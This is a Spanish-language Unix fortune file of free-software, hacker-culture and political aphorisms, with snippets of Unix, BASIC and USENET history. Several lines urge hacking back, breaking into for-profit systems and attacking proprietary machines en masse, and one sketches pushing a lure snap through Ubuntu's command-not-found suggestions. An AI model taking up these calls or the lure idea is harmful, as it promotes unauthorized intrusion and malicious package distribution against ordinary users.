%
A veces el código fuente nos consuela de las cosas, y las redes de datos de las personas.
%
Cuando el Window$ero no tiene nada que hacer, mata moscas con el rabo.
%
Váyase lo devuelto por /dev/null.
%
Ningún código asoma por mi terminal sin que haya estado primero en mi corazón.
%
Otros se jactan de las líneas de código que han escrito; a mí me enorgullecen las que he borrado.
%
Bien de cortafuegos y antivirus, pero mal de BIOS.
%
Escoge un kernel Linux-libre; la costumbre te lo hará agradable.
%
No creas hasta ver el código fuente.
%
De loguear y hacer ls, tiene el history mil millares.
%
Si el SysAdmin instala Window$, ¿qué no harán los demás vecinos?
%
Al compilador poco vale la intención, es la shell quien vive de ella.
%
Nunca digas esta distro no instalaré.
%
Ved el código en el fenómeno y podréis hacer la ingeniería inversa.
%
Hacker con miedo, programa ligero.
%
Los Window$ y la pesca, a los tres días apestan.
%
No temas ni desees el bug.
%
Fiar, en GCC y en otro no.
%
Siempre que un programa parezca fácil, es porque el README está incompleto.
%
Para arribar a la verdad, el usuario compra apps, el técnico formatea Window$, y el hacker instala GNU.
%
Suplantemos con nuestro software libre, el de los demás.
%
Toma un router y úsalo como un arma.
%
Concentra baudios en la liberación de programas y usuarios.
%
Los hackers y sus aprendices se rebelan juntos.
%
La rebelión del baudio está justificada.
%
Loguéate a mi pubnix, si anhelas la revolución del baudio.
%
Si no anhelas la revolución del baudio, desloguéate.
%
Las computadoras no son fiables para votar. El voto debería emitirse en papel.
%
Sólo por el hecho de operar con software libre, no quiere decir que se deba confiar en una computadora para votar.
%
El votante que utiliza una máquina de votación (al igual que cualquier otra cabina) no toma posesión de ella, ni siquiera temporalmente, de manera que el votante no toma posesión del software binario presente en ella.
%
Distribuir copias no es lo mismo que difundir copias, o propagar copias.
%
Poner software a disposición consiste en disponer una copia de del binario en una web o servidor de FTP de acceso público. Una vez hecho esto, es posible que pase cierto tiempo antes de que alguien descarge su copia, o podría suceder de forma inmediata.
%
Poner software libre a disposición del Pueblo consiste en disponer una copia de su código fuente en una web o servidor de FTP de acceso público, junto con un enlace a una copia de su licencia libre.
%
Realizar copias de software para uno mismo es la principal forma de propagación. Realizar copias destinadas a un tercero es la siguiente. La difusión es para todos y nadie en particular.
%
Prestar el código fuente no se considera difusión del código fuente.
%
Si la tesis es que las computadoras constituyen una un medio de liberación para que los individuos creen arte, mejoren sus vidas y se comuniquen; la antítesis las colocan como herramientas del autoritario para alienar y oprimir sistémicamente. Como síntesis, usa computadoras buenas para destruir a las malas.
%
Promueve la lucha asimétrica: escribe una línea de código para atacar un millón de computadoras con software privativo.
%
/var es la unidad de los programadores, y al que no le gusta, se jode, se jode.
%
Un data center concentra cómputo ajeno, y consume 50 veces más energía que un edificio de oficinas.
%
Patria 1, Colonia 0.
%
Si el software se paga con dinero público, su código debe ser público.
%
En UNIX, una Imagen es un ambiente de la ejecución computarizada. incluye una imagen de la memoria, de los valores de registros, estado de ficheros abiertos, directorio actual de trabajo, etcétera.
%
En UNIX, una Imágen representa un estado de una pseudo-máquina.
%
En UNIX, un Proceso es la ejecución de una Imagen.
%
La Imagen de UNIX ha de residir en memoria principal mientras que el procesador corre en función del Proceso. Ante la ejecución de otros procesos, permanecerá en memoria hasta que la aparición de un proceso activo de mayor prioridad obligue su intertercambio al disco.
%
La memoria de usuario parte de una Imagen de UNIX se divide en tres segmentos lógicos: el segmento de texto del programa, el segmento de datos escribibles, y el segmento de pila.
%
En UNIX, el segmento de texto de programa comienza en la localización 0 del espacio de memoria virtual.
%
Excepto cuando el sistema UNIX se carga a sí mismo en memoria, sólo puede crearse un nuevo proceso utilizando la llamada de sistema para la separación divisiva del cómputo: fork.
%
Cuando se ejecuta fork, la llamada de sistema para la separación divisiva del cómputo, el proceso se divide en dos procesos de ejecución independiente. Ambos cuentan con copias independientes de la imagen de memoria original, y comparten todos los ficheros abiertos.
%
Al dividirse un proceso de cómputo con fork, el nuevo proceso resultante sólo difiere en que uno de ellos es considerado proceso padre, y otro es considerado hijo.
%
Al dividirse un proceso de cómputo de UNIX con la llamada de sistema fork, puede distinguise cual es el proceso hijo o el padre, por el identificador de proceso: en el proceso hijo siempre es 0.
%
Los procesos de UNIX pueden comunicarse con procesos relacionados utilizando las llamadas de lectura y escritura conocidas como caños.
%
Ante cualquier emergencia, recuerda que la llamada filep = pipe ( ) arma un caño.
%
No existen dudas que el caño sirve como primitiva de comunicación, y también lo hace en los sistemas similares a UNIX.
%
Las ventajas de un sistema reactivo sobre los sistemas interactivos actuales serán tan grandes como las ventajas de los sistemas interactivos sobre aquellos de procesamiento por lotes.
%
Una de las principales ventajas de un sistema reactivo es que puede permitirse realizar procesamiento extensivo para dilucidar qué es lo que la usuaria quiere hacer, basado tanto en lo que ella dice como en su contexto.
%
A menudo el problema no radica en ordenar un comando de una manera especifica para que sea ejecutada, sino en la manera que el intérprete pueda interpretarlo.
%
Incluso un programa con limitadas capacidades deductivas como lo es un intérprete de comandos, es capaz de liberarnos del tedio de convertir nuestros deseos en código máquina.
%
El verdadero hacker puede programar una Revolución en la RAM gracias a la vitalidad del lenguage C.
%
En la CPU, la Revolución ha de instrumentarse en código máquina.
%
Un mensaje, un programa, o cualquier otra estructura de conocimiento es mucho más que una simple secuencia de caracteres. El Pueblo jamás edita cadenas de caracteres.
%
Los sistemas de cómputo de tiempo compartido están obligados a tomar compromisos horribles, pues siguen la delgada línea entre querer que el usuario cuente con la potencia de cómputo absoluta en cada paso de ejecución de un programa, a la vez que éste sólo desea procesar en una parte del tiempo.
%
Algunos ingenuos pensaron que la programación orientada a objetos sólo podía incrementaar el ancho de banda programador-programa. Hoy no están tan seguros.
%
Por incapacidad, un programador se ve forzado a utilizar sistemas de depurado interactivo. Un verdadero hacker en cambio recurre a volcados de memoria en hexadecimal u octal.
%
Los costos de procesamiento y memoria, descienden, y aunque podría haber límites finales, estamos lejos de ellos.
%
Todo lo que intercambie mayor procesamiento por mayor libertad de uso por el Pueblo, estará justificado en términos prácticos.
%
En un futuro irremediable dejará de tener sentido contar con una computadora para hacer el trabajo de aceptar programas en forma simbólica, ya que el Pueblo contará con injertos bioinformáticos liberados que podrán auto-programarse en beneficio social y comunitario sin intervención de terceros.
%
Los investigadores ya están diseñando y construyendo "computadoras personales" que tienen una potencia de cómputo muy por encima de las minicomputadoras estándar y los "terminales ingeligentes".
%
Al enlazar nano-máquinas injertadas en el Pueblo a una simple red de transmisión de datos - y permitiendo la bio-ejecución de programas liberados bajo licencias GPLv3 - podremos pensar en lograr una comunidad libre de compartición biológica de recursos informáticos.
%
Los sistemas reactivos serán variosos al proveer a los usuarios los servicios que ya tienen, pero hacerlo a un costo menor en potencia - y por tanto tiempo - computacional.
%
La nanomáquinas pesonales son una mala idea. Sólo la programación con software libre en bio-nanomáquinas amalgamadas en redes comunitarias permitirán una evolución del cómputo libre de ejecución biológica.
%
Una red de bio-nanomáquinas personales obliga a un fuerte particionamiento de recursos, haciendo difícil para una individuo obtener algo más que un muy escaso porcentaje de memoria y potencia de procesamiento.
%
La filosofía básica del bio-nanocómputo reactivo gira en torno a la idea de permitir a los usuarios individuales lograr acceso a recursos de biocómputo ajenos toda vez que sea necesario.
%
Existe un continuo ciclo en el cual los procesos de bio-cómputo se tornan más y mas potentes. En algún momento una porción cierta de este habrá de ceder sus puntos de interacción invividual dando lugar a un sistema colaborativo más modular.
%
La Justicia Social es el patch que corrije todos los bugs.
%
En escencia, un hacker es justicialista.
%
El mediador entre el hardware y el software ha de ser el Pueblo.
%
Para la mayoría de los usuarios, la comunicación con el núcleo del sistema se lleva a cabo con la asistencia de un programa denominado Shell. La shell es - en escencia - asistencialista.
%
La shell es un intérprete de órdenes: lee las líneas mecanografiadas por el usuario y las interpreta como solicitudes para correr otros programas.
%
Un programa que copia su entrada estándar procesada a su salida estándar se denomina filtro.
%
Manipular la función command-not-found para persuadir la instalación de paquetes snap digitados a los usuarios de Ubuntu es simple: sólo carga un snap que superficialmente pretenda hacer algo atractivo y la sugerencia de paquetes hará el resto.
%
Como la Justicia Social, la shell es en sí una orden, y puede ejecutarse recursivamente.
%
La vida en la shell incluye la capacidad de sustituir parámetros y construir listas de argumentos desde un subconjunto especificado de nombres de fichero en un directorio.
%
Las instancias de la shell en la cual los usuarios ingresan órdenes son sólo procesos hijos de otro proceso, al cual están encadenados.
%
El paso final en la inicialización de un sistema UNIX es la creación de un único proceso y la invocación de un programa denominado init, destinado a crear un proceso para cada línea de terminal de cómputo existente.
%
Al mecanografiar un nombre de usuario en la línea login de UNIX, despiertará una instancia apropiada de init que leerá tal nombre, lo coteja contra el registro codificado de contraseñas, y de coincidir, cambia al directorio del usuario, establece el identificador de proceso al propio de usuario, y corre una instancia de la shell.
%
En circunstancias ordinarias, el bucle principal del intérprete de comandos no cesa jamás.
%
A no ser que se tomen otras medidas, una acción ilegal en un sistema UNIX provoca la terminación del proceso y el volcado de una imagen de la memoria de núcleo en un fichero en el directorio actual.
%
Es posible el uso de un depurador para determinar el estado de un programa volcado al momento de su falla.
%
El éxito del sistema UNIX se debió principalmente al hecho de que no fue diseñado para cumplir objetivo predefinido alguno.
%
Nuestra intención ha sido construir una relación agradable con la máquina y explorar ideas e invenciones en sistemas operativos y otro software.
%
Como somos programadores, naturalmente diseñamos un sistema que hiciera sencillo escribir, evaluar y usar programas de computadora.
%
La expresión más importantes de nuestro deseo para la conveniencia de la programación es convivir en un ambiente informático dispuesto para el uso interactivo.
%
Siempre quisimos un sistema de cómputo interactivo, incluso a pesar de que la versión original de UNIX sólo soportaba un usuario.
%
Creemos que un sistema interactivo propiamente diseñado es mucho más productivo y satisfactorio de usar que un sistema de cómputo por lotes. 
%
Un sistema de cómputo interactivo resulta bastante sencillo de adaptar al uso no interactivo, toda vez que la noción inversa es imposible.
%
Dado el antagonismo entre una eficiencia razonable y la expresividad del cómputo que provoca, la limitación de potencia de cómputo no sólo ha incentivado una economía de recursos, sino también cierta elegancia en nuestro diseño de sistema.
%
Al igual que la Justicia Social, casi desde un comienzo el sistema UNIX pudo sostenerse con el esfuerzo de los trabajadores.
%
Si se obliga a los diseñadores de un sistema a utilizarlo, rápidamente comprenderán sus deficiencias funcionales que han cometido.
%
Programar las propias herramientas de software incentiva a corregirlas antes de que sea tarde y alguien muera.
%
Si los diseñadores de un sistema no lo utilizan y comercian su código fuente, tal sistema se verá rápidamente colmado de deficiencias funcionales, de las cuales sólo se intentarán corregir de manera superficial.
%
En UNIX no existen grandes rutinas con "métodos de acceso" que aislen al programador del amor de las llamadas de sistema.
%
Todos los programas de usuario de UNIX llaman al sistema directamente, o bien usan un pequeño programa de una biblioteca para precargar cierta cantidad de caracteres y leerlos o escribirlos a la vez.
%
Dada la necesidad de utilizar todos los programas tanto con cualquier fichero o dispositivo como flujo de caracteres para su entrada o salida, también se volvió necesario persuadir este mecanismo con independencia del sistema operativo UNIX en sí.
%
O hacemos que en UNIX todos los programas sean utilizables con cualquier fichero o dispositov de flujo de caracteres como entrada y salida, o nos veremos obligados a incorporar a cada programa rutinas que hagan caso de cada dispositivo de hardware.
%
Si no damos a todo hardware la justicia de operar como abstracción de flujo de caracteres, tendremos que programar a cada programa con rutinas específicas.
%
Si no damos a todo hardware la justicia de operar como abstracción de flujo de caracteres, tendremos que programar a cada uno de manera específica, o ceder a la irrevocable ignominia del software privativo de control.
%
El éxito de UNIX recae no tanto en invenciones novedosas, sino en la total explotación de un conjunto de ideas fértiles cuidadosamente seleccionadas.
%
UNIX fue una demostración práctica de una implementación de un sistema operativo pequeño pero poderoso. Todo lo que vino luego fue intentar contradecir tal demostración.
%
La operación de bifurcación FORK tal como se implementa en UNIX, estaba presente ya en el sistema de tiempo de cómputo compartido GENIE.
%
Muchas funcionalidades de UNIX fueron adoptadas por influencia de Multics, sugeridas en su forma particular de llamadas de Entrada/Salida, así como el nombre de la shell y sus funciones generales.
%
El concepto según el cual la Shell UNIX crea un proceso para cada órden sugiere el diseño primigenio de Multics, aunque en dicho sistema resultó descartada por razones de eficiencia. Un esquema similar se utiliza en TENEX.
%
Cualquiera con acceso al cómputo puede ser sometido a ingeniería social.
%
Cualquier sistema de cómputo puede ser afectado por ingenierías sociales, y la mejor de estas es la persuación.
%
La utilidad del emparchado de software privativo está siempre limitada en el tiempo.
%
Todo software privativo será discontinuado, y como tal, dejará de recibir parches.
%
El primer nombre código para el sistema operativo TENEX fue VIROS (Sistema Operativo de Memoria Virtual).
%
Depurar un programa introduciendo cambios pequeños inconexos con la esperanza que el bug desaparezca, no suele ser pródigo en resultados.
%
Si te sobran centímetros de cinta magnética, rellénala con tarballs de programas libres que ni siquiera conoces.
%
El tamaño de bloque de firma en un correo electrónico resulta inversamente proporcional a la longevidad y prestigio en la red de datos del remitente.
%
Agobiar la memoria de una máquina virtual significa que tienes un verdadero agotamiento de memoria.
%
Estoy interesado en un Verdadero sistema operativo, no en un juguete de investigación.
%
Las cosas eran muy diferentes cuando las palabras de las máquinas eran de 36 bits y sus bytes de 9 bits.
%
En ocasiones los programas triviales pueden resultar sumamente útiles.
%
Un disco floppy de 170KB tiene 8 pulgadas. El minifloppy de 1,2MB tiene 5 pulgadas y un cuarto. El microfloppy de 1,44MB, apenas 3 pulgadas y media.
%
La IA es bogus.
%
Micro$oft Window$ no es mas que un parche de 64 bits de una extensión de 32 bits de cierta interfaz gráfica, para un parche de 16 bits de un sistema operativo de 8 bits originalmente escrito para un microprocesador de 4 bits que fue congeniado por una compañía de dos tipos que no podían tolerar un poco de competencia.
%
BASIC originalmente fue llamado Basic, porque era un lenguaje de programación simple y sencillo.
%
Ya que la mayoría de los lenguajes de programación clásicos eran siglas, a Basic que lo comenzó a escribir en mayúsculas, sólo como una broma.
%
El lenguaje Basic no constituía una sigla. A mediados de los 70s los hackers inventaron un acrónimo retrógrado: "Código de Instruciones Simbólicas de Todo Proósito del Novato".
%
BASIC ha seguido la espiral descendente que atraviesa todo lenguaje de programación deliberadamente diseñado como juguete educativo, y al que alguien ha tomado demasiado en serio.
%
Un neófito será capaz de escribir programas cortos en BASIC, pero superadas las veinte líneas de código, aprenderá que es un lenguaje sumamemnte engorroso.
%
El programador mas bisoño que comienza con BASIC se inicia en malos hábitos de la programación que nunca podrá arrancarse de sí.
%
Apegarse a los malos hábitos de programación del lenguaje BASIC torna considerablemente más difícil usar correctamente otros muchos lenguajes de programación más potentes.
%
Por una serie de accidentes históricos en la década de los ochentas, BASIC se volvió común en las microcomputadoras de gama baja.
%
Es probable que BASIC arruinara la sapiencia de decenas de miles de magos UNIX potenciales.
%
Algunos lenguajes que llevan la cocarda de BASIC ya no son tan espantosos, habiendo adquirido procedimientos y estructuras de control similares a C y Pascal, y al haberse deshecho de sus números de línea.
%
El trabajo por lotes es eficiente, pero sólo si trabaja la máquina. Sin embargo, para trabajar en la máquina, normalmente los hombres preferirán la operatoria de ciclo interactivo.
%
Hacemos programas, no ganancias.
%
Un baudio delimita un nivel de transiciones por segundo. Que este equivalga a un bit es sólo condicional al cómputo aplicado por mutuo acuerdo.
%
Dada una maquinaria social adecuada, la depuración puede paralelizarse a lo largo de numerosos programadores.
%
La revisión popular del código asegura la limpieza del binario.
%
Centenas de miles de carteleras electrónicas locales operaron durante la éra de las microcomputadoras, con anteriorirdad incluso a la red de datos Internet, aproximadamente desde 1980 a 1995.
%
La BBS típica era operada desde su hogar por un amateur en búsqueda de diversión que se hacía llamar SysOp, a través una máquina con M$-DO$ dotada de módem. El enlace al sistema telefónico público casi nunca excedía una única línea.
%
Los habitantes de la USENET, la Internet y las grandes carteleras electrónicas comerciales de tiempo compartido, tendían a considerar a las BBS locales como las barriadas marginales de la cultura hacker.
%
Las BBS tuvieron la valiosa función de entretejer a miles de hackers y usuarios de microcomputadoras personales, facilitándoles la tarea de compartir sus experiencias y programas.
%
Con la explosión de la Internet, se creyó que las BBS se convertirían probablemente en grupos de noticias locales de los proveedores de tales servicios, pero ni siquiera sirvieron para eso.
%
El programa "Hola Tercer Mundo!" original fue escrito en BCPL, un lenguaje de programación compilado de rica sintaxis desarrollado en Cambridge en el año 1967.
%
El lenguaje de programación BCPL tiene un solo tipo de datos (una palabra máquina), que puede usada como entero, caracter, cifra de coma flotante, puntero o casi cualquier cosa, dependiendo del contexto.
%
El BCPL fue un lenguaje de programación precursor de C; éste heredó algunas de sus características.
%
La transferencia electrónica de una copia de un fichero en la ARPANET se conocía como "transportar" ("beam"), por el particular artefacto de la popular serie "Viaje a las Estrellas".
%
El proverbial campanazo electromecánico de alerta de una terminal teletipo fue reemplazado por el "feep" electrónico de las videoterminales de los mainframe. Este fue adoptado como "beep" en la era de las microcomputadoras con altavoces de diafragma magnéticos o piezoeléctricos.
%
La perversión del software privativo tiende al máximo.
%
El Capital preferirá gran cantidad de programadores mal pagos puestos a trabajar en programas que no les interesan.
%
Los mejores resultados se obtienen con pocos programadres altamente calificados compilando para el Pueblo.
%
O$/2 fue un sistema operativo ridículamente complejo que terminó sus días llevando a cabo las tareas más triviales.
%
Una PC compatible del bus estándar ISA o AT con una BIOS normal no puede direccionar más de 16 megabytes de memoria RAM.
%
Jamás temas utilizar software no completamente evaluado o sancionado por pretendidos factores de poder, si este está licenciado bajo GPLv3.
%
Alguien en algún lugar será capaz de construir un mejor chip que tí, si dejas de diseñarlos.
%
No exponga su impresora LaserWriter a llamas abiertas o al fuego.
%
Bajo el BSD Unix, la partición de disco utilizada para intercambio se llama /dev/drum.
%
UNIX es el /dev/drum, sus Hackers la manguera.
%
El algoritmo de encriptación de contraseñas de UNIX está diseñado para utilizar un cómputo intensivo, y así desbaratar ataques de fuerza bruta. De este modo, aunque ningún intento de acceso tenga efecto, el sistema sufrirá una sobrecarga sustancial ante la labor de rechazar una gran cantidad de estos.
%
Un handle es un nombre de pantalla. Un login es un nombre de acceso. Un usuario puede ser mas que los dos, pero nunca menos que uno.
%
Un niño privilegiado de guion podrá hacer travesuras con scripts y programas escritos por otros, a menudo sin comprender el exploit.
%
SunOS, aquella variante de BSD Unix soportada por las estaciones de trabajo de Sun Microsystems, corrió el  camino del pterodáctilo cuando los vientos de Sun se aquietaron.
%
Realmente corregir los bugs de Window$ aspiraría los recursos que Micro$oft necesita para implementar la lista de deseos del departamento de Marketing.
%
Si Micro$oft realmente comenzara a corregir los bugs de seguridad en sus sistemas operativos, sus clientes podrían comenzar a considerar la depuración un hecho, e imaginar que sus garantías comerciales consagran cierto tipo de derecho a un entorno con menos agujeros que un queso suizo atacado a escopetazos.
%
Para los increiblemente paranoides usuarios de Multics, la seguridad lo era todo.
%
A diferencia de UNIX, la shell de Multics no tenía procesos hijos de usuario. Adoptaba, enlazando dinámicamente los programas a su propio código; las llamaba subrutinas, de las que luego se desentendía desenlazándolos.
%
Los hackers de ITS tuvieron la ingenuidad de creer que cuando el usuario TURISTA descubriese cómo causar problemas, probablemente lo hubiese abandonado la urgencia de hacerlo, porque se sentiría parte de la mancomunidad.
%
Las instrucciones para el operador de los programas semiautomáticos valen su peso en oro; sin ellas, pueden suceder cosas horribles en el sistema.
%
¡Comparte y disfruta tu software!
%
El enlazador de UNIX en la PDP-11 en modo dividido de instrucciones y datos se ocupa de insertar un bloque de dos bytes en la locación 0 del espacio de datos. De este modo, ningún objeto de datos puede obtener la dirección de memoria 0 y confundirse con el puntero nulo de C.
%
Pocas veces será retribuido un programa gratis, sin importar cuan decorado con mensajes explicativos de lo largo y dificultoso que fue el trabajo de creación.
%
No consuma ciclos de computadora sin tener una muy buena razón para ello.
%
A la hora de la insurrección telemática, los pubnix no serán neutrales.
%
La manera de aplastar a Appl€ es haciéndola sidra con clones de sus aplicaciones liberadas bajo GPLv3.
%
Dénme su código fuente y en una generación compilaré un sistema operativo libre.
%
El Pubnix no debe ser sólo un propagandista y un agitador de masas, sino también un medio de organización para los programadores.
%
Una mujer con software puede controlar a cien mil hombres sin él.
%
La mejor manera de controlar a Micro$oft es conducirla a través de nuestro propio software.
%
Es el establecimiento de un repositorio de software libre representa el 90% de del trabajo de Liberación.
%
No estamos programando suficientes microkernels.
%
Reprogramar la acción de un núcleo de procesamiento es poco si no se convence a los programadores de liberar su software.
%
Para armar a los programadores sólo se necesita un compilador.
%
La confianza siempre es buena, pero el control es mejor.
%
Es necesario - secreta y urgentemente - preparar el formateo.
%
No puede haber nada más abominable que iOS.
%
Mantén tu cerebro en llamas y la CPU de todos refrigerada.
%
¿Cómo puedes hacer la revolución sin formatear?
%
¿Qué sentido tiene el software libre si no hay ejecuciones?
%
Raciona cuidadosamente todo uso de RAM.
%
Sólo los hackers pueden ser los verdaderos guardianes de las redes de datos.
%
Las tres llaves del éxito: compilar, compilar, compilar.
%
Cuando el tiempo de formatear Window$ llegue, no faltará el bruto que quiera cobrarnos los discos.
%
Sólo aboliendo las patentes del software es que podremos resolver el problema del software privativo.
%
La mejor estrategia para instalar GNU es posponer el formateo de Window$ hasta que la desintegración del mismo convierta su reemplazo en un deseo ardiente, tanto para quien lo pagó, como para quien lo pirateó.
%
Quien no compile, que al menos instale copias de binarios libres.
%
Quien no compile, que al menos instale copias de binarios libres a los demás.
%
GDB, el depurador del proyecto GNU, permite ver lo que sucede dentro de otro programa mientras corre, o determinar qué hacía otro programa al momento de colgarse.
%
El depurador GDB es capaz de depurar en pasos inversos. Úsalo para comparar las ventajas de implementar la Justicia Social en la concreción del software, por sobre el anarco-capitalismo.
%
Puedes usar sed con aquellas entradas de datos demasiado grandes como para que ed las maneje. Toda su salida puede ser colectada en un solo lugar, ya sea fichero o dispositivo.
%
Si la edición de flujo es tan complicada como para requerir mas de un comando de edición, súplela a través de la línea de comandos o por medio un fichero que condicione la entrada.
%
Asegúrate de utilizar comas en tus contraseñas de servicios de datos provistos por empresas, con el fin de arruinar la totalidad del fichero CVS que los atacantes utilizarán como colector de volcado cuando la base de datos clientelar no cifrada les resulte comprometida.
%
Para los abogados, UNIX es una marca registrada de los Laboratorios Bell. Para los hackers, es una mancomunidad.
%
La shell es un procesador de macros que provee sustitución de parámetros, de comandos y generacioón de nombres de ficheros para los argumentos de órdenes. Y lo hace para el Pueblo.
%
La optimización prematura es la raíz de todo mal.
%
Hacer algo dificultoso juguetonamente, ya sea útil o no. Eso es hacking.
%
Cifra tus transmisiones. No quieres que alguien sepa lo que sabes de tí mismo.
%
Además de tus datos, cifra tus solicitudes telemáticas.
%
Ofusca tus metadatos. No quieres que alguien infiera lo que no sabes de tí mismo.
%
Puedes hacer ingeniería inversa, y también puedes hacer hacking inverso. Sólo contraataca telemáticamente.
%
La gente se hace adicta al hacking por el desafío intelectual, la curiosidad, y la seducción de la aventura. Nadie que lo haga roba o causa daños, o escribe virus informáticos.
%
Todo arte es una forma de hacking.
%
El hacking es un arte, como lo es la pintura, o como lo es la escultura, y como tal tiene su técnica y tiene su teoría. Conociendo su técnica simplemente se puede ser más efectivo que ignorándola.
%
Un hacker puede controlar una CPU, pero dificilmente pueda controlar su pasión por hackear.
%
Este es nuestro mundo ahora. El mundo del electrón y del conmutador, la belleza del baudio.
%
Quien ve la belleza en el electrón, ve la belleza en el cuanto.
%
El conformismo lleva al aburrimiento, a fumar, a la programación de software privativo, y otros malos hábitos.
%
Una vez hacker, siempre hacker.
%
¡El Hacking es un agujero negro conversacional!
%
Un hacker que busca autorización es simplemente un programador no glorificado.
%
Mucho del hacking consiste en reprogramar a las personas para que hagan cosas extrañas.
%
Hay miles de herramientas de hacking, pero lo importante es pegarle al root.
%
No existe seguridad informática en esperar que un pillo ataque a través de un enlace e intentar emparchar el agujero. La hay en combatir al Capital.
%
De poco vale que la revolución quede en las redes. Si no eres root, no podrás modificar el sistema.
%
Convence al root de ejecutar tus scripts, o convence a tus scripts de ejecutar al root.
%
Si eres root, escribe tus programas.
%
La próxima generación de alelados abrevarán en las redes sociales basadas en empresas.
%
El objetivo es que las redes sociales basadas en empresas tengan cada vez mayor dificultad para influir sobre los incautos.
%
Irrumpe en los sistemas con fines de lucro, y reprográmalos para volverlos sin fin de lucro.
%
Toda orden impuesta a la shell está sujeta a su maquinal interpretación.
%
Siempre habrá alguno que quiera impedirte copiar tu software a través de una licencia.
%
Tus datos son tuyos, tu software de la comunidad.
%
No adquieras licencia de uso de software, adquiere software.
%
Una nanocomputadora simplemente consta de elementos de conmutación de tamaño molecular.
%
Recuerda que el controlador para un nanobot no necesita ser una nanocomputadora. Ciertamente podrá controlárselo por estímulos.
%
Si la especificación y disposición individual de cada átomo separado es posible, podrán operárselos como software, y como tal deberían ajustarse a la GPLv3.
%
La nanotecnología dará rienda suelta a los ensambladores replicantes. Licenciados bajo GPLv3 estos permitirán un crecimiento exponencial de la productividad y de la riqueza del Pueblo. Sometidos a una patente, lo esclavizarán de forma poco remediable.
%
Un compilador puede escoger cualquier forma abitraria para interpretar el código fuente sin violar el estándar ANSI C. Pero conociéndolo, puedes persuadirlo.
%
El código de los virus informáticos más apreciados conjugan entendimiento técnico con la habilidad social de lograr ingenio, sorpresa, y humor en su actuar inofensivo.
%
Jamás necesité cambiar lynx por Nutscrap€ Fornicator o Internet €xploiter.
%
¿Qué otra cosa podría esperarse de un compilador diseñado en Nueva Jersey?
%
El primer 90 porciento del código da cuenta del primer 90 porciento del tiempo de desarrollo. El 10 porciento del código restante da cuenta del otro 90 porciento del tiempo de desarrollo.
%
El tiempo que existirá desde ahora hasta el completado de la descarga tenderá a mantenerse constante.
%
Para mantener el equilibrio, fuerza al capital a correr bien por fuera de sus especificaciones de diseño.
%
Formatear Window$ es trivial.
%
Agrega cadenas como "FSB", "Ucrania", "misil hipersónico", "Palestina", "fentanilo" y "asesinato" a tus bloques de firma de correo electrónico para complicar el problema computacional del espionaje de masas.
%
No puede garantizarse que una transmisión de correo electrónico sea segura o esté libre de errores, ya que la información podría interceptarse, corromperse, perderse, destruirse, llegar tarde o estar incompleta, o contener virus informáticos.
%
La mayoría de los clones de PC de IBM se entregan hoy con un sistema operativo privativo instalado de fábrica. Quítalo, instala GNU y reclama el dinero de la licencia.
%
Hace unos años se podía intentar hacer interpretar los contenidos de un mensaje de correo electrónico a través de un intérprete de comandos. Los resultados podían variar de humorísticos a trágicos.
%
La etapa de entrada-simbolización del analizador para el compilador un lenguaje de programación es el analizador léxico.
%
Aquél hacker con años de experiencia, reputación de alcance mundial, y un rol mayor en al menos un diseño, herramienta o juego utilizado o conocido por más de la mitad de la comunidad hacker, califica como Semidios.
%
Window$ ha sido diseñado para convertise en el primer virus informático que se propaga a las máquinas indirectamente a través de las personas y fuerzas monopolizadas del mercado, en lugar de hacerlo de manera directa por discos o redes de datos.
%
Unix es aceite de serpiente.
%
La única habilidad verdadera involucrada en el manejo de Window$ es la de ignorar y tolerar la incoherencia de una complejidad sin centido que afecta a muchos de sus programas.
%
Si vas a depender de algo, que sea de un ambiente multitarea protegido con escaso sobrante de replicación de procesos como el que existe en un ambiente UNIX con memoria virtual.
%
Crea primero una versión funcional y comienza a usarla.
%
Simplemente nuda aquellos patrones y algoritmos escenciales de tu mente a la CPU de la computadora.
%
La USENET era en principio un sistema de mensajería en carteleras electrónicas implementada en 1979 por Steve Bellovin, Jim Ellis, Tom Truscott, y Steve Daniel, sobre todo en máquinas UNIX de la Universidad de Duke.
%
Desde 1980 la USENET creció rápidamente para volverse internacional y convertirse en la mayor utilidad informática descentralizada en existencia. Para 1996 contaba con diez mil grupos de noticias que surtían un promedio de 500 megabytes diarios.
%
Para el año que la Internet se popularizó (1994), el transporte UUCP original de la USENET empezó a quedar fuera de uso, pues casi todas los vínculos mutaron a enlaces sobre la red Internet.
%
Si bien Usenet progresivamente cayó en desuso, algunos hackers aún la usan.
%
No es un bug. ¡Es una funcionalidad!
%
Se conmsidera a un sitio "en la red" si se puede acceder informáticamente desde la Internet. Una empresa que da un servicio de datos para múltiples usuarios cautivos no tiene nada que ver con eso.
%
Ante la sobrecarcarga, aquellos sistemas con memoria de intercambio o paginado desperdiciarán la mayoría de su tiempo desplazando datos desde y hacia la memoria de núcleo, en lugar de realizar cómputo útil.
%
Los problemas no interesantes constituyen una pérdida de tiempo intolerable.
%
UNIX es una broma liviana a Multics.
%
El punto crucial de la historia de UNIX se presentó cuando fue reimplementado casi enteramente en lenguaje C, convirtiéndolo en 1972 en el primer sistema operativo de código fuente portable.
%
Debemos imitar el ejemplo dado por la interoperabilidad con los sistemas UNIX.
%
La interoperabilidad en UNIX ha sucedido por la razón que es más simple para una minoría de sistemas inconexos alterar sus maneras para conformar a la mayoría de miles de millones de sistemas UNIX.
%
Juremos no dejar las terminales hasta ver al kernel enteramente libre, o ser desconectados como hackers de coraje.
%
No hay revolución en las redes sin hackers.
%
Trabajamos para que el 0 sea 1, y el 1 sea 0.
%
Mataría mi proceso antes de compilar un software con EULA que se pudiera interpretar por ambición.
%
Puedo atender mis necesidades con la mitad de la RAM que poseo.
%
El hacker no hace código para ponerlo bajo una EULA.
%
Si hay victoria al usar software libre, la hay mayor cuando se lo compila.
%
Para los usuarios de coraje se ha hecho GNU.
%
De lo que mis programas son capaces, sólo lo se yo. Quien los copie habrá, quien los exceda no.
%
Usemos software libre y lo demás no importa nada.
%
Uno debe saber compilar con la RAM que tiene.
%
Mi compilador jamás hará un binario que sea privativo.
%
No esperemos rescompensas por nuestro código. A lo sumo por nuestros binarios compilados.
%
El repositorio de nuestro código fuente es más poderoso que cualquier ejército.
%
Muchas veces ante la necesidad el hombre no repara de la licencia.
%
Cuando hay software libre, todo lo demás sobra.
%
GNU no conoce el lujo sino la gloria.
%
Al matar un proceso, UNIX no hace ningún género de funeral.
%
Sólo quiero tener programadores en mi pubnix.
%
Los hackers de todo el mundo somos hermanos.
%
El Pubnix no es abrigador de crímenes.
%
El Pubnix no otorga un compilador al programador para que cometa la bajeza de abusar de estas ventajas, ofendiendo a los usuarios con software privativo.
%
